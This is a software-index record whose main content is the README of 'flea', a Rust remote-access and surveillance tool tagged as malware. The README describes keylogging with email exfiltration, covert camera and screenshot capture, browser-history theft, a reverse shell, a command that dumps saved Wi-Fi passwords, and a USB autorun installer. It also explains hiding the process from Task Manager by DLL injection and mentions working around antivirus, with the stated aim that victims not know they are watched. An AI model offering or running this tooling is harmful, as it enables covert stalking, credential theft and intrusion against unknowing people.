{"id":20041598,"url":"https://github.com/rozensoftware/flea","last_synced_at":"2025-05-05T08:32:20.263Z","repository":{"id":64222175,"uuid":"568471206","full_name":"rozensoftware/flea","owner":"rozensoftware","description":"A simple command server written in Rust.","archived":false,"fork":false,"pushed_at":"2024-06-03T19:35:08.000Z","size":368,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-04-08T19:48:02.337Z","etag":null,"topics":["csharp","encryption-decryption","ftp","hacking","key-logger","linux","malware","remote-control","rust","server","spying","surveillance","windows"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rozensoftware.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-11-20T16:30:25.000Z","updated_at":"2024-08-02T12:17:15.000Z","dependencies_parsed_at":"2024-06-03T15:52:22.096Z","dependency_job_id":"65f3f92c-c52f-474e-aef2-fade7dc4adbe","html_url":"https://github.com/rozensoftware/flea","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Fflea","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Fflea/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Fflea/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rozensoftware%2Fflea/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rozensoftware","download_url":"https://codeload.github.com/rozensoftware/flea/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252466820,"owners_count":21752442,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["csharp","encryption-decryption","ftp","hacking","key-logger","linux","malware","remote-control","rust","server","spying","surveillance","windows"],"created_at":"2024-11-13T10:47:13.271Z","updated_at":"2025-05-05T08:32:19.667Z","avatar_url":"https://github.com/rozensoftware.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Flea\n\nVersion: 0.2.6\n\nA simple command server written in Rust, which can be used as either a command server or a malware, depending on how the software is intended to be used.\n\nThis repository consists of three projects:\n\n- Command Server (root)\n- Simple Command Sender (flea-client)\n- Flea Monitor (C#, WPF, Windows only)\n\nThe server is the main project that will be developed. The client is a test program used to validate the protocol and core functionality of the Flea Server. Flea Monitor is a GUI application for conveniently managing the server. Unless otherwise stated, Flea works on both Linux and Windows operating systems.\n\n![Flea Monitor](https://github.com/rozensoftware/flea/blob/master/FleaMonitor.png)\n\nThe Flea Monitor would be developed simultaneously with the Flea Server. It doesn't use the client for communication with the server. It is a standalone application for Windows only.\n\n## Purpose\n\nThe Flea Server can be utilized as a remote command execution tool or as a program for monitoring and surveillance. It has the capability to spy on computer activities, making it suitable for parental monitoring of children. The purpose of the Flea Server can be customized to meet specific requirements.\n\n## Features\n\n- Remote commands execution based on XML format\n- Taking screenshots of a host\n- Sending screenshot file to FTP server and/or to the client\n- Uploading a file from FTP to the host\n- Bash execution on a host (doesn't work perfectly on Windows)\n- Key logger\n- Key logger can be sent to an email\n- Web browsing history of Microsoft Edge, Firefox and Google Chrome\n- OS process list\n- Killing a process\n- Simple file server\n- Auto update\n- Camera capture\n- OS info\n- Reverse shell for Windows\n- File encryption\n\nThe key logger file is cleared during server startup.\nThe program's capabilities will be enhanced as the software is developed.\nTo update the server, a new version must be uploaded to the installation location. The new file should be named flea.upd. The server will automatically update on the next run.\n\n## FTP Server\n\nOne of Flea's features is the ability to send and receive files from an FTP server. Flea Monitor provides its own FTP server, which can be accessed using the username \"anonymous\" and any password. This allows for anonymous authentication. The shared folder is created in your TEMP folder with the name \"FleaFTP\". Please note that this folder may be deleted when cleaning temporary files. You can start the FTP server by selecting the option from the File menu. There is also an option to stop it. The FTP server only works when Flea Monitor is running and will shut down when the application is closed.\n\n[FubarDev FTP Server](https://github.com/FubarDevelopment/FtpServer) project has been used here.\n\n## Command format\n\nThe Flea Server requires an XML formatted command like below:\n\n```xml\n\u003cCommand name='command_name' value='optional_value'\u003e\u003c/Command\u003e\n```\n\nCurrently supported commands are:\n\n- **version** : Returns current protocol version.\n- **bash** : A host bash command. The value property has to have a command line to execute in a host.\n- **ftpscreenshot** : Takes a screenshots of the host and sends it to FTP server.\n- **screenshot** : Takes a screenshot and sends it to the caller. The client supports this and saves data into screenshot.png file name.\n- **log** : Reads current key logger file and sends its content to receiver.\n- **proclist** : Displays currently running processes in the system.\n- **kill** : Kills a process. 'value' parameter must include PID.\n- **upload** : Uploads a file to the host from FTP server. The file name must be specified in the 'value' parameter of the XML command.\n- **dir** : Retreives content of current directory.\n- **cd** : Changes the current directory to the new one passed in the 'value' parameter (.. means level up).\n- **pwd** : Gets server's working directory.\n- **getfile** : Downloads a file passed in the 'value' parameter to the client. The file is read from the current path on the server.\n- **setftp** : Sets new FTP parameters: address, user name, password. Parameters must be provided in the 'value' in the following format, e.g. 127.0.0.1;user;my_pass.\n- **setemail** : Sets email parameters where key logger file will be sent to in a format: address to, address from, email account user name, password, host address.\n- **sendkeylog** : Sends key logger file on email\n- **history** : Reads web browsers history of a user which flea process is running for: Edge (Windows only), Firefox and Google Chrome. Data returned is: URL, Title and Visits Number.\n- **camera** : Captures one frame (or two seconds long movie on Windows) from camera. The 'value' parameter must have a filename e.g.: frame.jpg (or movie.wmv on Windows). The server with Flea must have a camera installed.\n- **sysinfo** : Gets system info\n- **restart** : Restarts the Flea Server. Good for patching.\n- **lockscreen** : Locks the screen. It can be unlocked in normal way by typing a password.\n- **encrypt** : Encrypts a file with a key\n- **decrypt** : Decrypts a file with a key\n- **quit** : Quits the program. Must be run again.\n\nNew commands will be added later.\n\n## Flea Client\n\nThe client is used for testing, but can also be used to send commands to the Flea Server.\n\nThese are the example commands:\n\nGet current version of the Flea Protocol:\n\n```bash\n./flea-client -a 127.0.0.1 -c version\n```\n\nTake screenshot and send it to the FTP server:\n\n```bash\n./flea-client -a 127.0.0.1 -c ftpscreenshot\n```\n\nTake screenshot and send it to the caller. It'll be saved as screenshot.png file:\n\n```bash\n./flea-client -a 127.0.0.1 -c screenshot\n```\n\nUpload test.txt file from FTP server to the host where Flea Server is running on (test.txt file must exist on FTP server already):\n\n```bash\n./flea-client -a MY_SERVER_NAME -c upload -v test.txt\n```\n\nGet wlan network profiles (Windows only):\n\n```bash\n./flea-client -a MY_SERVER_IP -c bash -v \"netsh wlan show profiles\"\n```\n\nand information with password (Windows only):\n\n```bash\n.\\flea-client.exe -a 192.168.0.18 -c bash -v \"netsh wlan show profile name=network_profile_name key=clear\"\n```\n\nChange current directory to the previous one:\n\n```bash\n./flea-client --address MY_SERVER -c cd -v ..\n```\n\nGet camera frame:\n\n```bash\n./flea-client -a 192.168.0.1 -c camera -v frame.jpg\n```\n\n## Building\n\nExcept having installed Rust on Linux you also need to install the following packages to build the software:\n\n```text\nbuild-essential, pkg-config, libx11-dev, libxcb-randr0-dev, libxcb-shm0-dev, libv4l-dev, libssl-dev\n```\n\nOn Windows, all you need is Rust (alongside a C++ compiler).\n\nIf for some reason a camera capture is not needed you can exclude it from build by removing *features = [\"camera\"]* from cargo.toml:\n\n```toml\nflealib = {path = \"flealib\", features = [\"camera\"], version = \"0.2\"}\n```\n\nSo, without camera the line should look like:\n\n```toml\nflealib = {path = \"flealib\", version = \"0.2\"}\n```\n\nOn Windows CameraLib.dll file must be copied to the directory in which flea.exe is installed (if standard build with camera is enabled).\nCameraLib.dll can be found in lib directory. This is a 64bit application tested in Windows 11 only. Should work on Widnows 10 too. It uses Microsoft Media Foundation to access the camera.\n\n## Installation\n\nThe Flea Server reads the host name of the computer and opens a port there. The IP address can be provided by using -s parameter. If you intend to use FTP server, you will need to complete the connection data. You can do this directly in the code:\n\n```rust\n//Enter your data for FTP Server connection\nconst FTP_USER_NAME: \u0026str = \"enter_ftp_user_name\";\nconst FTP_PASS_NAME: \u0026 str = \"enter_ftp_user_password\";\nconst FTP_ADDRESS_NAME: \u0026 str = \"enter_ftp_server_ip_address\";\nconst FTP_FOLDER_NAME: \u0026 str = \"enter_ftp_folder_name\";\nconst SMTP_USER_NAME: \u0026str = \"enter_smtp_user_name\";\nconst EMAIL_ADDRESS_TO: \u0026str = \"enter_email_address\";\nconst EMAIL_ADDRESS_FROM: \u0026str = \"enter_email_address\";\nconst SMTP_PASS_NAME: \u0026str = \"enter_smtp_password\";\nconst SMTP_HOST_NAME: \u0026str = \"enter_smtp_host\";\n\n```\n\nor in the created configuration file (recommended). On Linux you will find the configuration file in a directory: /home/user_name/.config/flea_conf/ .\nThese parameters can be also changed remotely by sending *setftp* command.\n\nYou should do the same when defining a connection to a mailbox. You need to specify the email address to which the file will be sent, the sender's address, the user name of the email account, the password and the address of the email server.\n\nThe best way to send messages is to use your own email server, which does not require fancy authorizations. Currently, GMail is not suitable for this. Perhaps in your case you will be able to properly authorize the application and GMail.\n\nThe email address should look like this: test \u003c`test@domain.ext`\u003e - name, space and full address surrounded with \u003c\u003e characters.\n\n*Update your default-config-file.tom file if you have previous version (0.2.4 or earlier) or flea won't process commands due to missing configuration.*\n\nBuild The Flea server:\n\n```bash\ncargo build --release\n```\n\nThere are various methods of running and installing this software, so I will not describe them here, as they depend directly on your preferences and needs.\nThe Flea program could be run on the target system, for example:\n\n(I assume that you are typing commands in the same directory where the server executable file is located.)\n\n```bash\n./flea \u0026\n```\n\nThis run the server as a separate process.\nOn Windows however, you can uncomment line 1 in main.rs.\n\nIf you'd like to see debug output from the process run the command:\n\n```bash\nRUST_LOG=debug ./flea\n```\n\nYou can specify IP address on which the server will be listen on:\n\n```bash\n./flea -s 127.0.0.1\n```\n\nThe port number is hardcoded into the program code. It can be changed there or new functionality can be implemented to specify it as a command parameter.\nIf you are running the server in the console, you can stop it by pressing CTRL-C.\n\nFor a quick installation on a computer, you can use the \"installflea.ps1\" script located in the \"install\" folder. Simply copy \"flea.exe\", \"CameraLib.dll\", \"HideProcessHook.dll\", and \"installflea.ps1\" to a USB pendrive, connect it to the computer where you want to install the software, and run the script as an administrator. The Flea will be installed automatically, and a new autorun task and firewall rule will be created for you.\nYou can modify the script further to achieve the desired functionality.\nPlease note that this script only works on Windows and in a PowerShell environment.\nYou may encounter a network access permission message, which you should confirm.\n\nCopying the \"HideProcessHook.dll\" file is not mandatory. However, if you want to take advantage of hiding the program in the Windows Task Manager, it must be placed in the application directory. It will be injected into the Task Manager to hide the \"flea.exe\" process. This can only be done when \"flea.exe\" is running with elevated privileges. That is why the install script registers the task with the highest run level.\nThe hook injector that I used and modified to my needs is based on the work of [ryan-weil](https://github.com/ryan-weil/HideProcessHook).\n**Remember to uncomment line in main.rs file if you want to not show the cmd window:**\n\n```rust\n#![windows_subsystem = \"windows\"]\n```\n\n## Reverse Windows shell (test function)\n\nWhen the program is called with the -b command, it will make a repeated attempt to connect to the remote server every 2 seconds. You can use The *Rozbie Farm* to open a reverse shell (see below: Similar Software). Unfortunately, the address and port of the remote computer must be entered in the program code. Also, the installation script should be changed so that the program runs with this option. For a complete reverse shell feature the *Rozbie* malware should be used.\n\n```powershell\n./flea -b\n```\n\n## File encryption\n\nThis option allows you to remotely encrypt the specified file with the key passed in the command. Subsequent decryption using the same key is possible. The key must be 256 bits (32 bytes) long.\n\nExample:\n\n```powershell\n.\\flea-client -a 192.168.0.18 -c encrypt -v \"a very simple secret key to use!;test.txt\"\n```\n\nThe key is separated from the file name by a semicolon character.\n\nDecryption:\n\n```powershell\n.\\flea-client -a 192.168.0.18 -c decrypt -v \"a very simple secret key to use!;test.txt\"\n```\n\n## Antivirus\n\nI encountered an issue while testing the software on McAfee. It blocked the installation using the install.ps1 script, falsely identifying it as a virus. To resolve this, I had to remove the execution of flea.exe from the script. A similar issue occurred with Microsoft Defender.\n\n## Camera capture\n\nThe Flea Server has the ability to record a short vidoes. On Linux a single frame is taken but on Windows two seconds long video is recorded.\nCurrently the user can see a glowing light next to the camera when it is on. This is something to work on because we won't a user to know he was being watched.\n\n## Additional scripts\n\nIn *scrpipt* folder there could be find additional scripts. Currently there is only *lock.sh* bash script you can copy to install directory. Its purpose is to lock and shutdown screen on Linux. I decided to not write additional command for this on Linux as it is quite easy to execute the script by sending **bash** command to the server.\nWindows version is implemented by using *lockscreen* command.\n\n## Similar Software\n\nPlease look at the [Rozbie](https://github.com/rozensoftware/rozbie) which has less features but it's more simpler and provides an access to the target computer too.\n\n## FAQ\n\nQ: Why does the Flea Monitor show a connection error even when the flea is running?\n\nA: Everything is fine, except that the Flea Monitor requires configuration on the first start. Go to Settings and enter a valid IP address that the flea is listening to. Restart the application.\n\n## License\n\nThis project is licensed under MIT license (LICENSE-MIT or \u003chttp://opensource.org/licenses/MIT\u003e).\n\n## Contributing / Feedback\n\nI am quite new to Rust. I am always glad to learn from anyone.\nIf you want to contribute, you are more than welcome to be a part of the project! Try to share you thoughts first! Feel free to open a new issue if you want to discuss new ideas.\n\nAny kind of feedback is welcome!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frozensoftware%2Fflea","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frozensoftware%2Fflea","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frozensoftware%2Fflea/lists"}